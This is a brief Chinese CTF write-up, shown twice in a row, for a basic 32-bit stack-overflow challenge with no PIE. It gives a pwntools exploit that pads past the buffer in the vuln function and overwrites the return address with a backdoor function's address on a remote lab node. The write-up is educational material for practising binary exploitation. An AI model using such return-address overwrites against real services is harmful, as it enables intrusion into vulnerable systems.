最基本的栈溢出
check
32位,没开pie
溢出点在vuln函数:
有后门函数直接覆盖返回地址即可:
exp:
from pwn import *
p=remote('node4.buuoj.cn',25082)
flag=0x080485CB
payload='a'*(0x28+4)+p32(flag)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()路虽远行则将至,事虽难做则必成!
路虽远行则将至,事虽难做则必成!
最基本的栈溢出
check
32位,没开pie
溢出点在vuln函数:
有后门函数直接覆盖返回地址即可:
exp:
from pwn import *
p=remote('node4.buuoj.cn',25082)
flag=0x080485CB
payload='a'*(0x28+4)+p32(flag)
p.recvuntil('\n')
p.sendline(payload)
p.interactive()